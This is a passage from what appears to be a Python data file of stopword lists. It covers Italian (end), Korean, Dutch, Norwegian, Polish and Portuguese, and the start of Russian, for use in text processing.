        "loro",
        "lui",
        "lungo",
        "luogo",
        "là",
        "ma",
        "macche",
        "magari",
        "maggior",
        "mai",
        "male",
        "malgrado",
        "malissimo",
        "mancanza",
        "marche",
        "me",
        "medesimo",
        "mediante",
        "meglio",
        "meno",
        "mentre",
        "mesi",
        "mezzo",
        "mi",
        "mia",
        "mie",
        "miei",
        "mila",
        "miliardi",
        "milioni",
        "minimi",
        "ministro",
        "mio",
        "modo",
        "molti",
        "moltissimo",
        "molto",
        "momento",
        "mondo",
        "mosto",
        "nazionale",
        "ne",
        "negl",
        "negli",
        "nei",
        "nel",
        "nell",
        "nella",
        "nelle",
        "nello",
        "nemmeno",
        "neppure",
        "nessun",
        "nessuna",
        "nessuno",
        "niente",
        "no",
        "noi",
        "non",
        "nondimeno",
        "nonostante",
        "nonsia",
        "nostra",
        "nostre",
        "nostri",
        "nostro",
        "novanta",
        "nove",
        "nulla",
        "nuovo",
        "o",
        "od",
        "oggi",
        "ogni",
        "ognuna",
        "ognuno",
        "oltre",
        "oppure",
        "ora",
        "ore",
        "osi",
        "ossia",
        "ottanta",
        "otto",
        "paese",
        "parecchi",
        "parecchie",
        "parecchio",
        "parte",
        "partendo",
        "peccato",
        "peggio",
        "per",
        "perche",
        "perchè",
        "perché",
        "percio",
        "perciò",
        "perfino",
        "pero",
        "persino",
        "persone",
        "però",
        "piedi",
        "pieno",
        "piglia",
        "piu",
        "piuttosto",
        "più",
        "po",
        "pochissimo",
        "poco",
        "poi",
        "poiche",
        "possa",
        "possedere",
        "posteriore",
        "posto",
        "potrebbe",
        "preferibilmente",
        "presa",
        "press",
        "prima",
        "primo",
        "principalmente",
        "probabilmente",
        "proprio",
        "puo",
        "pure",
        "purtroppo",
        "può",
        "qualche",
        "qualcosa",
        "qualcuna",
        "qualcuno",
        "quale",
        "quali",
        "qualunque",
        "quando",
        "quanta",
        "quante",
        "quanti",
        "quanto",
        "quantunque",
        "quasi",
        "quattro",
        "quel",
        "quella",
        "quelle",
        "quelli",
        "quello",
        "quest",
        "questa",
        "queste",
        "questi",
        "questo",
        "qui",
        "quindi",
        "realmente",
        "recente",
        "recentemente",
        "registrazione",
        "relativo",
        "riecco",
        "salvo",
        "sara",
        "sarai",
        "saranno",
        "sarebbe",
        "sarebbero",
        "sarei",
        "saremmo",
        "saremo",
        "sareste",
        "saresti",
        "sarete",
        "sarà",
        "sarò",
        "scola",
        "scopo",
        "scorso",
        "se",
        "secondo",
        "seguente",
        "seguito",
        "sei",
        "sembra",
        "sembrare",
        "sembrato",
        "sembri",
        "sempre",
        "senza",
        "sette",
        "si",
        "sia",
        "siamo",
        "siano",
        "siate",
        "siete",
        "sig",
        "solito",
        "solo",
        "soltanto",
        "sono",
        "sopra",
        "sotto",
        "spesso",
        "srl",
        "sta",
        "stai",
        "stando",
        "stanno",
        "starai",
        "staranno",
        "starebbe",
        "starebbero",
        "starei",
        "staremmo",
        "staremo",
        "stareste",
        "staresti",
        "starete",
        "starà",
        "starò",
        "stata",
        "state",
        "stati",
        "stato",
        "stava",
        "stavamo",
        "stavano",
        "stavate",
        "stavi",
        "stavo",
        "stemmo",
        "stessa",
        "stesse",
        "stessero",
        "stessi",
        "stessimo",
        "stesso",
        "steste",
        "stesti",
        "stette",
        "stettero",
        "stetti",
        "stia",
        "stiamo",
        "stiano",
        "stiate",
        "sto",
        "su",
        "sua",
        "subito",
        "successivamente",
        "successivo",
        "sue",
        "sugl",
        "sugli",
        "sui",
        "sul",
        "sull",
        "sulla",
        "sulle",
        "sullo",
        "suo",
        "suoi",
        "tale",
        "tali",
        "talvolta",
        "tanto",
        "te",
        "tempo",
        "ti",
        "titolo",
        "torino",
        "tra",
        "tranne",
        "tre",
        "trenta",
        "troppo",
        "trovato",
        "tu",
        "tua",
        "tue",
        "tuo",
        "tuoi",
        "tutta",
        "tuttavia",
        "tutte",
        "tutti",
        "tutto",
        "uguali",
        "ulteriore",
        "ultimo",
        "un",
        "una",
        "uno",
        "uomo",
        "va",
        "vale",
        "vari",
        "varia",
        "varie",
        "vario",
        "verso",
        "vi",
        "via",
        "vicino",
        "visto",
        "vita",
        "voi",
        "volta",
        "volte",
        "vostra",
        "vostre",
        "vostri",
        "vostro",
        "è",
    ],
    "ko": [
        "!",
        '"',
        "$",
        "%",
        "&",
        "'",
        "(",
        ")",
        "*",
        "+",
        ",",
        "-",
        ".",
        "...",
        "0",
        "1",
        "2",
        "3",
        "4",
        "5",
        "6",
        "7",
        "8",
        "9",
        ";",
        "<",
        "=",
        ">",
        "?",
        "@",
        "\\",
        "^",
        "_",
        "`",
        "|",
        "~",
        "·",
        "—",
        "——",
        "‘",
        "’",
        "“",
        "”",
        "…",
        "、",
        "。",
        "〈",
        "〉",
        "《",
        "》",
        "가",
        "가까스로",
        "가령",
        "각",
        "각각",
        "각자",
        "각종",
        "갖고말하자면",
        "같다",
        "같이",
        "개의치않고",
        "거니와",
        "거바",
        "거의",
        "것",
        "것과 같이",
        "것들",
        "게다가",
        "게우다",
        "겨우",
        "견지에서",
        "결과에 이르다",
        "결국",
        "결론을 낼 수 있다",
        "겸사겸사",
        "고려하면",
        "고로",
        "곧",
        "공동으로",
        "과",
        "과연",
        "관계가 있다",
        "관계없이",
        "관련이 있다",
        "관하여",
        "관한",
        "관해서는",
        "구",
        "구체적으로",
        "구토하다",
        "그",
        "그들",
        "그때",
        "그래",
        "그래도",
        "그래서",
        "그러나",
        "그러니",
        "그러니까",
        "그러면",
        "그러므로",
        "그러한즉",
        "그런 까닭에",
        "그런데",
        "그런즉",
        "그럼",
        "그럼에도 불구하고",
        "그렇게 함으로써",
        "그렇지",
        "그렇지 않다면",
        "그렇지 않으면",
        "그렇지만",
        "그렇지않으면",
        "그리고",
        "그리하여",
        "그만이다",
        "그에 따르는",
        "그위에",
        "그저",
        "그중에서",
        "그치지 않다",
        "근거로",
        "근거하여",
        "기대여",
        "기점으로",
        "기준으로",
        "기타",
        "까닭으로",
        "까악",
        "까지",
        "까지 미치다",
        "까지도",
        "꽈당",
        "끙끙",
        "끼익",
        "나",
        "나머지는",
        "남들",
        "남짓",
        "너",
        "너희",
        "너희들",
        "네",
        "넷",
        "년",
        "논하지 않다",
        "놀라다",
        "누가 알겠는가",
        "누구",
        "다른",
        "다른 방면으로",
        "다만",
        "다섯",
        "다소",
        "다수",
        "다시 말하자면",
        "다시말하면",
        "다음",
        "다음에",
        "다음으로",
        "단지",
        "답다",
        "당신",
        "당장",
        "대로 하다",
        "대하면",
        "대하여",
        "대해 말하자면",
        "대해서",
        "댕그",
        "더구나",
        "더군다나",
        "더라도",
        "더불어",
        "더욱더",
        "더욱이는",
        "도달하다",
        "도착하다",
        "동시에",
        "동안",
        "된바에야",
        "된이상",
        "두번째로",
        "둘",
        "둥둥",
        "뒤따라",
        "뒤이어",
        "든간에",
        "들",
        "등",
        "등등",
        "딩동",
        "따라",
        "따라서",
        "따위",
        "따지지 않다",
        "딱",
        "때",
        "때가 되어",
        "때문에",
        "또",
        "또한",
        "뚝뚝",
        "라 해도",
        "령",
        "로",
        "로 인하여",
        "로부터",
        "로써",
        "륙",
        "를",
        "마음대로",
        "마저",
        "마저도",
        "마치",
        "막론하고",
        "만 못하다",
        "만약",
        "만약에",
        "만은 아니다",
        "만이 아니다",
        "만일",
        "만큼",
        "말하자면",
        "말할것도 없고",
        "매",
        "매번",
        "메쓰겁다",
        "몇",
        "모",
        "모두",
        "무렵",
        "무릎쓰고",
        "무슨",
        "무엇",
        "무엇때문에",
        "물론",
        "및",
        "바꾸어말하면",
        "바꾸어말하자면",
        "바꾸어서 말하면",
        "바꾸어서 한다면",
        "바꿔 말하면",
        "바로",
        "바와같이",
        "밖에 안된다",
        "반대로",
        "반대로 말하자면",
        "반드시",
        "버금",
        "보는데서",
        "보다더",
        "보드득",
        "본대로",
        "봐",
        "봐라",
        "부류의 사람들",
        "부터",
        "불구하고",
        "불문하고",
        "붕붕",
        "비걱거리다",
        "비교적",
        "비길수 없다",
        "비로소",
        "비록",
        "비슷하다",
        "비추어 보아",
        "비하면",
        "뿐만 아니라",
        "뿐만아니라",
        "뿐이다",
        "삐걱",
        "삐걱거리다",
        "사",
        "삼",
        "상대적으로 말하자면",
        "생각한대로",
        "설령",
        "설마",
        "설사",
        "셋",
        "소생",
        "소인",
        "솨",
        "쉿",
        "습니까",
        "습니다",
        "시각",
        "시간",
        "시작하여",
        "시초에",
        "시키다",
        "실로",
        "심지어",
        "아",
        "아니",
        "아니나다를가",
        "아니라면",
        "아니면",
        "아니었다면",
        "아래윗",
        "아무거나",
        "아무도",
        "아야",
        "아울러",
        "아이",
        "아이고",
        "아이구",
        "아이야",
        "아이쿠",
        "아하",
        "아홉",
        "안 그러면",
        "않기 위하여",
        "않기 위해서",
        "알 수 있다",
        "알았어",
        "앗",
        "앞에서",
        "앞의것",
        "야",
        "약간",
        "양자",
        "어",
        "어기여차",
        "어느",
        "어느 년도",
        "어느것",
        "어느곳",
        "어느때",
        "어느쪽",
        "어느해",
        "어디",
        "어때",
        "어떠한",
        "어떤",
        "어떤것",
        "어떤것들",
        "어떻게",
        "어떻해",
        "어이",
        "어째서",
        "어쨋든",
        "어쩔수 없다",
        "어찌",
        "어찌됏든",
        "어찌됏어",
        "어찌하든지",
        "어찌하여",
        "언제",
        "언젠가",
        "얼마",
        "얼마 안 되는 것",
        "얼마간",
        "얼마나",
        "얼마든지",
        "얼마만큼",
        "얼마큼",
        "엉엉",
        "에",
        "에 가서",
        "에 달려 있다",
        "에 대해",
        "에 있다",
        "에 한하다",
        "에게",
        "에서",
        "여",
        "여기",
        "여덟",
        "여러분",
        "여보시오",
        "여부",
        "여섯",
        "여전히",
        "여차",
        "연관되다",
        "연이서",
        "영",
        "영차",
        "옆사람",
        "예",
        "예를 들면",
        "예를 들자면",
        "예컨대",
        "예하면",
        "오",
        "오로지",
        "오르다",
        "오자마자",
        "오직",
        "오호",
        "오히려",
        "와",
        "와 같은 사람들",
        "와르르",
        "와아",
        "왜",
        "왜냐하면",
        "외에도",
        "요만큼",
        "요만한 것",
        "요만한걸",
        "요컨대",
        "우르르",
        "우리",
        "우리들",
        "우선",
        "우에 종합한것과같이",
        "운운",
        "월",
        "위에서 서술한바와같이",
        "위하여",
        "위해서",
        "윙윙",
        "육",
        "으로",
        "으로 인하여",
        "으로서",
        "으로써",
        "을",
        "응",
        "응당",
        "의",
        "의거하여",
        "의지하여",
        "의해",
        "의해되다",
        "의해서",
        "이",
        "이 되다",
        "이 때문에",
        "이 밖에",
        "이 외에",
        "이 정도의",
        "이것",
        "이곳",
        "이때",
        "이라면",
        "이래",
        "이러이러하다",
        "이러한",
        "이런",
        "이럴정도로",
        "이렇게 많은 것",
        "이렇게되면",
        "이렇게말하자면",
        "이렇구나",
        "이로 인하여",
        "이르기까지",
        "이리하여",
        "이만큼",
        "이번",
        "이봐",
        "이상",
        "이어서",
        "이었다",
        "이와 같다",
        "이와 같은",
        "이와 반대로",
        "이와같다면",
        "이외에도",
        "이용하여",
        "이유만으로",
        "이젠",
        "이지만",
        "이쪽",
        "이천구",
        "이천육",
        "이천칠",
        "이천팔",
        "인 듯하다",
        "인젠",
        "일",
        "일것이다",
        "일곱",
        "일단",
        "일때",
        "일반적으로",
        "일지라도",
        "임에 틀림없다",
        "입각하여",
        "입장에서",
        "잇따라",
        "있다",
        "자",
        "자기",
        "자기집",
        "자마자",
        "자신",
        "잠깐",
        "잠시",
        "저",
        "저것",
        "저것만큼",
        "저기",
        "저쪽",
        "저희",
        "전부",
        "전자",
        "전후",
        "점에서 보아",
        "정도에 이르다",
        "제",
        "제각기",
        "제외하고",
        "조금",
        "조차",
        "조차도",
        "졸졸",
        "좀",
        "좋아",
        "좍좍",
        "주룩주룩",
        "주저하지 않고",
        "줄은 몰랏다",
        "줄은모른다",
        "중에서",
        "중의하나",
        "즈음하여",
        "즉",
        "즉시",
        "지든지",
        "지만",
        "지말고",
        "진짜로",
        "쪽으로",
        "차라리",
        "참",
        "참나",
        "첫번째로",
        "쳇",
        "총적으로",
        "총적으로 말하면",
        "총적으로 보면",
        "칠",
        "콸콸",
        "쾅쾅",
        "쿵",
        "타다",
        "타인",
        "탕탕",
        "토하다",
        "통하여",
        "툭",
        "퉤",
        "틈타",
        "팍",
        "팔",
        "퍽",
        "펄렁",
        "하",
        "하게될것이다",
        "하게하다",
        "하겠는가",
        "하고 있다",
        "하고있었다",
        "하곤하였다",
        "하구나",
        "하기 때문에",
        "하기 위하여",
        "하기는한데",
        "하기만 하면",
        "하기보다는",
        "하기에",
        "하나",
        "하느니",
        "하는 김에",
        "하는 편이 낫다",
        "하는것도",
        "하는것만 못하다",
        "하는것이 낫다",
        "하는바",
        "하더라도",
        "하도다",
        "하도록시키다",
        "하도록하다",
        "하든지",
        "하려고하다",
        "하마터면",
        "하면 할수록",
        "하면된다",
        "하면서",
        "하물며",
        "하여금",
        "하여야",
        "하자마자",
        "하지 않는다면",
        "하지 않도록",
        "하지마",
        "하지마라",
        "하지만",
        "하하",
        "한 까닭에",
        "한 이유는",
        "한 후",
        "한다면",
        "한다면 몰라도",
        "한데",
        "한마디",
        "한적이있다",
        "한켠으로는",
        "한항목",
        "할 따름이다",
        "할 생각이다",
        "할 줄 안다",
        "할 지경이다",
        "할 힘이 있다",
        "할때",
        "할만하다",
        "할망정",
        "할뿐",
        "할수있다",
        "할수있어",
        "할줄알다",
        "할지라도",
        "할지언정",
        "함께",
        "해도된다",
        "해도좋다",
        "해봐요",
        "해서는 안된다",
        "해야한다",
        "해요",
        "했어요",
        "향하다",
        "향하여",
        "향해서",
        "허",
        "허걱",
        "허허",
        "헉",
        "헉헉",
        "헐떡헐떡",
        "형식으로 쓰여",
        "혹시",
        "혹은",
        "혼자",
        "훨씬",
        "휘익",
        "휴",
        "흐흐",
        "흥",
        "힘입어",
        "︿",
        "！",
        "＃",
        "＄",
        "％",
        "＆",
        "（",
        "）",
        "＊",
        "＋",
        "，",
        "０",
        "１",
        "２",
        "３",
        "４",
        "５",
        "６",
        "７",
        "８",
        "９",
        "：",
        "；",
        "＜",
        "＞",
        "？",
        "＠",
        "［",
        "］",
        "｛",
        "｜",
        "｝",
        "～",
        "￥",
    ],
    "nl": [
        "aan",
        "achte",
        "achter",
        "af",
        "al",
        "alle",
        "alleen",
        "alles",
        "als",
        "ander",
        "anders",
        "beetje",
        "behalve",
        "beide",
        "beiden",
        "ben",
        "beneden",
        "bent",
        "bij",
        "bijna",
        "bijv",
        "blijkbaar",
        "blijken",
        "boven",
        "bv",
        "daar",
        "daardoor",
        "daarin",
        "daarna",
        "daarom",
        "daaruit",
        "dan",
        "dat",
        "de",
        "deden",
        "deed",
        "derde",
        "derhalve",
        "dertig",
        "deze",
        "dhr",
        "die",
        "dit",
        "doe",
        "doen",
        "doet",
        "door",
        "drie",
        "duizend",
        "echter",
        "een",
        "eens",
        "eerst",
        "eerste",
        "eigen",
        "eigenlijk",
        "elk",
        "elke",
        "en",
        "enige",
        "er",
        "erg",
        "ergens",
        "etc",
        "etcetera",
        "even",
        "geen",
        "genoeg",
        "geweest",
        "haar",
        "haarzelf",
        "had",
        "hadden",
        "heb",
        "hebben",
        "hebt",
        "hedden",
        "heeft",
        "heel",
        "hem",
        "hemzelf",
        "hen",
        "het",
        "hetzelfde",
        "hier",
        "hierin",
        "hierna",
        "hierom",
        "hij",
        "hijzelf",
        "hoe",
        "honderd",
        "hun",
        "ieder",
        "iedere",
        "iedereen",
        "iemand",
        "iets",
        "ik",
        "in",
        "inderdaad",
        "intussen",
        "is",
        "ja",
        "je",
        "jij",
        "jijzelf",
        "jou",
        "jouw",
        "jullie",
        "kan",
        "kon",
        "konden",
        "kun",
        "kunnen",
        "kunt",
        "laatst",
        "later",
        "lijken",
        "lijkt",
        "maak",
        "maakt",
        "maakte",
        "maakten",
        "maar",
        "mag",
        "maken",
        "me",
        "meer",
        "meest",
        "meestal",
        "men",
        "met",
        "mevr",
        "mij",
        "mijn",
        "minder",
        "miss",
        "misschien",
        "missen",
        "mits",
        "mocht",
        "mochten",
        "moest",
        "moesten",
        "moet",
        "moeten",
        "mogen",
        "mr",
        "mrs",
        "mw",
        "na",
        "naar",
        "nam",
        "namelijk",
        "nee",
        "neem",
        "negen",
        "nemen",
        "nergens",
        "niemand",
        "niet",
        "niets",
        "niks",
        "noch",
        "nochtans",
        "nog",
        "nooit",
        "nu",
        "nv",
        "of",
        "om",
        "omdat",
        "ondanks",
        "onder",
        "ondertussen",
        "ons",
        "onze",
        "onzeker",
        "ooit",
        "ook",
        "op",
        "over",
        "overal",
        "overige",
        "paar",
        "per",
        "recent",
        "redelijk",
        "samen",
        "sinds",
        "steeds",
        "te",
        "tegen",
        "tegenover",
        "thans",
        "tien",
        "tiende",
        "tijdens",
        "tja",
        "toch",
        "toe",
        "tot",
        "totdat",
        "tussen",
        "twee",
        "tweede",
        "u",
        "uit",
        "uw",
        "vaak",
        "van",
        "vanaf",
        "veel",
        "veertig",
        "verder",
        "verscheidene",
        "verschillende",
        "via",
        "vier",
        "vierde",
        "vijf",
        "vijfde",
        "vijftig",
        "volgend",
        "volgens",
        "voor",
        "voordat",
        "voorts",
        "waar",
        "waarom",
        "waarschijnlijk",
        "wanneer",
        "waren",
        "was",
        "wat",
        "we",
        "wederom",
        "weer",
        "weinig",
        "wel",
        "welk",
        "welke",
        "werd",
        "werden",
        "werder",
        "whatever",
        "wie",
        "wij",
        "wijzelf",
        "wil",
        "wilden",
        "willen",
        "word",
        "worden",
        "wordt",
        "zal",
        "ze",
        "zei",
        "zeker",
        "zelf",
        "zelfde",
        "zes",
        "zeven",
        "zich",
        "zij",
        "zijn",
        "zijzelf",
        "zo",
        "zoals",
        "zodat",
        "zou",
        "zouden",
        "zulk",
        "zullen",
    ],
    "no": [
        "alle",
        "at",
        "av",
        "bare",
        "begge",
        "ble",
        "blei",
        "bli",
        "blir",
        "blitt",
        "både",
        "båe",
        "da",
        "de",
        "deg",
        "dei",
        "deim",
        "deira",
        "deires",
        "dem",
        "den",
        "denne",
        "der",
        "dere",
        "deres",
        "det",
        "dette",
        "di",
        "din",
        "disse",
        "ditt",
        "du",
        "dykk",
        "dykkar",
        "då",
        "eg",
        "ein",
        "eit",
        "eitt",
        "eller",
        "elles",
        "en",
        "enn",
        "er",
        "et",
        "ett",
        "etter",
        "for",
        "fordi",
        "fra",
        "før",
        "ha",
        "hadde",
        "han",
        "hans",
        "har",
        "hennar",
        "henne",
        "hennes",
        "her",
        "hjå",
        "ho",
        "hoe",
        "honom",
        "hoss",
        "hossen",
        "hun",
        "hva",
        "hvem",
        "hver",
        "hvilke",
        "hvilken",
        "hvis",
        "hvor",
        "hvordan",
        "hvorfor",
        "i",
        "ikke",
        "ikkje",
        "ingen",
        "ingi",
        "inkje",
        "inn",
        "inni",
        "ja",
        "jeg",
        "kan",
        "kom",
        "korleis",
        "korso",
        "kun",
        "kunne",
        "kva",
        "kvar",
        "kvarhelst",
        "kven",
        "kvi",
        "kvifor",
        "man",
        "mange",
        "me",
        "med",
        "medan",
        "meg",
        "meget",
        "mellom",
        "men",
        "mi",
        "min",
        "mine",
        "mitt",
        "mot",
        "mykje",
        "ned",
        "no",
        "noe",
        "noen",
        "noka",
        "noko",
        "nokon",
        "nokor",
        "nokre",
        "nå",
        "når",
        "og",
        "også",
        "om",
        "opp",
        "oss",
        "over",
        "på",
        "samme",
        "seg",
        "selv",
        "si",
        "sia",
        "sidan",
        "siden",
        "sin",
        "sine",
        "sitt",
        "sjøl",
        "skal",
        "skulle",
        "slik",
        "so",
        "som",
        "somme",
        "somt",
        "så",
        "sånn",
        "til",
        "um",
        "upp",
        "ut",
        "uten",
        "var",
        "vart",
        "varte",
        "ved",
        "vere",
        "verte",
        "vi",
        "vil",
        "ville",
        "vore",
        "vors",
        "vort",
        "vår",
        "være",
        "vært",
        "å",
    ],
    "pl": [
        "aby",
        "ach",
        "aj",
        "albo",
        "ale",
        "ani",
        "aż",
        "bardzo",
        "bez",
        "bo",
        "bowiem",
        "by",
        "byli",
        "bym",
        "być",
        "był",
        "była",
        "było",
        "były",
        "będzie",
        "będą",
        "chce",
        "choć",
        "ci",
        "ciebie",
        "cię",
        "co",
        "coraz",
        "coś",
        "czy",
        "czyli",
        "często",
        "daleko",
        "dla",
        "dlaczego",
        "dlatego",
        "do",
        "dobrze",
        "dokąd",
        "dość",
        "dr",
        "dużo",
        "dwa",
        "dwaj",
        "dwie",
        "dwoje",
        "dzisiaj",
        "dziś",
        "gdy",
        "gdyby",
        "gdyż",
        "gdzie",
        "go",
        "godz",
        "hab",
        "i",
        "ich",
        "ii",
        "iii",
        "ile",
        "im",
        "inne",
        "inny",
        "inż",
        "iv",
        "ix",
        "iż",
        "ja",
        "jak",
        "jakby",
        "jaki",
        "jakie",
        "jako",
        "je",
        "jeden",
        "jedna",
        "jednak",
        "jedno",
        "jednym",
        "jedynie",
        "jego",
        "jej",
        "jemu",
        "jest",
        "jestem",
        "jeszcze",
        "jeśli",
        "jeżeli",
        "już",
        "ją",
        "każdy",
        "kiedy",
        "kierunku",
        "kilku",
        "kto",
        "która",
        "które",
        "którego",
        "której",
        "który",
        "których",
        "którym",
        "którzy",
        "ku",
        "lat",
        "lecz",
        "lub",
        "ma",
        "mają",
        "mam",
        "mamy",
        "mgr",
        "mi",
        "miał",
        "mimo",
        "mnie",
        "mną",
        "mogą",
        "moi",
        "moja",
        "moje",
        "może",
        "można",
        "mu",
        "musi",
        "my",
        "mój",
        "na",
        "nad",
        "nam",
        "nami",
        "nas",
        "nasi",
        "nasz",
        "nasza",
        "nasze",
        "natychmiast",
        "nawet",
        "nic",
        "nich",
        "nie",
        "niego",
        "niej",
        "niemu",
        "nigdy",
        "nim",
        "nimi",
        "nią",
        "niż",
        "no",
        "nowe",
        "np",
        "nr",
        "o",
        "o.o.",
        "obok",
        "od",
        "ok",
        "około",
        "on",
        "ona",
        "one",
        "oni",
        "ono",
        "oraz",
        "owszem",
        "pan",
        "pl",
        "po",
        "pod",
        "ponad",
        "ponieważ",
        "poza",
        "prof",
        "przed",
        "przede",
        "przedtem",
        "przez",
        "przy",
        "raz",
        "razie",
        "roku",
        "również",
        "sam",
        "sama",
        "się",
        "skąd",
        "sobie",
        "sposób",
        "swoje",
        "są",
        "ta",
        "tak",
        "taki",
        "takich",
        "takie",
        "także",
        "tam",
        "te",
        "tego",
        "tej",
        "tel",
        "temu",
        "ten",
        "teraz",
        "też",
        "to",
        "tobie",
        "tobą",
        "trzeba",
        "tu",
        "tutaj",
        "twoi",
        "twoja",
        "twoje",
        "twój",
        "ty",
        "tych",
        "tylko",
        "tym",
        "tys",
        "tzw",
        "tę",
        "u",
        "ul",
        "vi",
        "vii",
        "viii",
        "vol",
        "w",
        "wam",
        "wami",
        "was",
        "wasi",
        "wasz",
        "wasza",
        "wasze",
        "we",
        "wie",
        "więc",
        "wszystko",
        "wtedy",
        "www",
        "wy",
        "właśnie",
        "wśród",
        "xi",
        "xii",
        "xiii",
        "xiv",
        "xv",
        "z",
        "za",
        "zawsze",
        "zaś",
        "ze",
        "zł",
        "żaden",
        "że",
        "żeby",
    ],
    "pt": [
        "a",
        "acerca",
        "adeus",
        "agora",
        "ainda",
        "algmas",
        "algo",
        "algumas",
        "alguns",
        "ali",
        "além",
        "ambos",
        "ano",
        "anos",
        "antes",
        "ao",
        "aos",
        "apenas",
        "apoio",
        "apontar",
        "após",
        "aquela",
        "aquelas",
        "aquele",
        "aqueles",
        "aqui",
        "aquilo",
        "as",
        "assim",
        "através",
        "atrás",
        "até",
        "aí",
        "baixo",
        "bastante",
        "bem",
        "bom",
        "breve",
        "cada",
        "caminho",
        "catorze",
        "cedo",
        "cento",
        "certamente",
        "certeza",
        "cima",
        "cinco",
        "coisa",
        "com",
        "como",
        "comprido",
        "conhecido",
        "conselho",
        "contra",
        "corrente",
        "custa",
        "cá",
        "da",
        "daquela",
        "daquele",
        "dar",
        "das",
        "de",
        "debaixo",
        "demais",
        "dentro",
        "depois",
        "desde",
        "desligado",
        "dessa",
        "desse",
        "desta",
        "deste",
        "deve",
        "devem",
        "deverá",
        "dez",
        "dezanove",
        "dezasseis",
        "dezassete",
        "dezoito",
        "dia",
        "diante",
        "direita",
        "diz",
        "dizem",
        "dizer",
        "do",
        "dois",
        "dos",
        "doze",
        "duas",
        "dá",
        "dão",
        "dúvida",
        "e",
        "ela",
        "elas",
        "ele",
        "eles",
        "em",
        "embora",
        "enquanto",
        "entre",
        "então",
        "era",
        "essa",
        "essas",
        "esse",
        "esses",
        "esta",
        "estado",
        "estar",
        "estará",
        "estas",
        "estava",
        "este",
        "estes",
        "esteve",
        "estive",
        "estivemos",
        "estiveram",
        "estiveste",
        "estivestes",
        "estou",
        "está",
        "estás",
        "estão",
        "eu",
        "exemplo",
        "falta",
        "fará",
        "favor",
        "faz",
        "fazeis",
        "fazem",
        "fazemos",
        "fazer",
        "fazes",
        "fazia",
        "faço",
        "fez",
        "fim",
        "final",
        "foi",
        "fomos",
        "for",
        "fora",
        "foram",
        "forma",
        "foste",
        "fostes",
        "fui",
        "geral",
        "grande",
        "grandes",
        "grupo",
        "hoje",
        "horas",
        "há",
        "iniciar",
        "inicio",
        "ir",
        "irá",
        "isso",
        "ista",
        "iste",
        "isto",
        "já",
        "lado",
        "ligado",
        "local",
        "logo",
        "longe",
        "lugar",
        "lá",
        "maior",
        "maioria",
        "maiorias",
        "mais",
        "mal",
        "mas",
        "me",
        "meio",
        "menor",
        "menos",
        "meses",
        "mesmo",
        "meu",
        "meus",
        "mil",
        "minha",
        "minhas",
        "momento",
        "muito",
        "muitos",
        "máximo",
        "mês",
        "na",
        "nada",
        "naquela",
        "naquele",
        "nas",
        "nem",
        "nenhuma",
        "nessa",
        "nesse",
        "nesta",
        "neste",
        "no",
        "noite",
        "nome",
        "nos",
        "nossa",
        "nossas",
        "nosso",
        "nossos",
        "nova",
        "nove",
        "novo",
        "novos",
        "num",
        "numa",
        "nunca",
        "não",
        "nível",
        "nós",
        "número",
        "o",
        "obra",
        "obrigada",
        "obrigado",
        "oitava",
        "oitavo",
        "oito",
        "onde",
        "ontem",
        "onze",
        "os",
        "ou",
        "outra",
        "outras",
        "outro",
        "outros",
        "para",
        "parece",
        "parte",
        "partir",
        "pegar",
        "pela",
        "pelas",
        "pelo",
        "pelos",
        "perto",
        "pessoas",
        "pode",
        "podem",
        "poder",
        "poderá",
        "podia",
        "ponto",
        "pontos",
        "por",
        "porque",
        "porquê",
        "posição",
        "possivelmente",
        "posso",
        "possível",
        "pouca",
        "pouco",
        "povo",
        "primeira",
        "primeiro",
        "promeiro",
        "próprio",
        "próximo",
        "puderam",
        "pôde",
        "põe",
        "põem",
        "qual",
        "qualquer",
        "quando",
        "quanto",
        "quarta",
        "quarto",
        "quatro",
        "que",
        "quem",
        "quer",
        "quero",
        "questão",
        "quieto",
        "quinta",
        "quinto",
        "quinze",
        "quê",
        "relação",
        "sabe",
        "saber",
        "se",
        "segunda",
        "segundo",
        "sei",
        "seis",
        "sem",
        "sempre",
        "ser",
        "seria",
        "sete",
        "seu",
        "seus",
        "sexta",
        "sexto",
        "sim",
        "sistema",
        "sob",
        "sobre",
        "sois",
        "somente",
        "somos",
        "sou",
        "sua",
        "suas",
        "são",
        "sétima",
        "sétimo",
        "tal",
        "talvez",
        "também",
        "tanto",
        "tarde",
        "te",
        "tem",
        "temos",
        "tempo",
        "tendes",
        "tenho",
        "tens",
        "tentar",
        "tentaram",
        "tente",
        "tentei",
        "ter",
        "terceira",
        "terceiro",
        "teu",
        "teus",
        "teve",
        "tipo",
        "tive",
        "tivemos",
        "tiveram",
        "tiveste",
        "tivestes",
        "toda",
        "todas",
        "todo",
        "todos",
        "trabalhar",
        "trabalho",
        "treze",
        "três",
        "tu",
        "tua",
        "tuas",
        "tudo",
        "tão",
        "têm",
        "um",
        "uma",
        "umas",
        "uns",
        "usa",
        "usar",
        "vai",
        "vais",
        "valor",
        "veja",
        "vem",
        "vens",
        "ver",
        "verdade",
        "verdadeiro",
        "vez",
        "vezes",
        "viagem",
        "vindo",
        "vinte",
        "você",
        "vocês",
        "vos",
        "vossa",
        "vossas",
        "vosso",
        "vossos",
        "vários",
        "vão",
        "vêm",
        "vós",
        "zero",
        "à",
        "às",
        "área",
        "é",
        "és",
        "último",
    ],
    "ru": [
        "а",
        "алло",
        "без",
        "белый",
        "близко",
        "более",
        "больше",
        "большой",
        "будем",
        "будет",
        "будете",
        "будешь",
        "будто",
        "буду",
        "будут",
        "будь",
        "бы",
        "бывает",
        "бывь",
        "был",
        "была",
        "были",
        "было",
        "быть",
        "в",
        "важная",
        "важное",
        "важные",
        "важный",
        "вам",
        "вами",
        "вас",
        "ваш",
        "ваша",
        "ваше",
        "ваши",
        "вверх",
        "вдали",
        "вдруг",
        "ведь",
        "везде",
        "вернуться",
        "весь",
        "вечер",
        "взгляд",
        "взять",
        "вид",
        "видеть",
        "вместе",
        "вниз",
        "внизу",
        "во",
        "вода",
        "война",
        "вокруг",
        "вон",
        "вообще",
        "вопрос",
        "восемнадцатый",
        "восемнадцать",
        "восемь",
        "восьмой",
        "вот",
        "впрочем",
        "времени",
        "время",
        "все",
        "всегда",
        "всего",
        "всем",
        "всеми",
        "всему",
        "всех",
        "всею",
        "всю",
        "всюду",
        "вся",
        "всё",
        "второй",
        "вы",
        "выйти",
        "г",
        "где",
        "главный",
        "глаз",
        "говорил",
        "говорит",
        "говорить",
        "год",
        "года",
        "году",
        "голова",
        "голос",
        "город",
        "да",
        "давать",
        "давно",
        "даже",
        "далекий",
        "далеко",
        "дальше",
        "даром",
        "дать",
        "два",
        "двадцатый",
        "двадцать",
        "две",
        "двенадцатый",
        "двенадцать",
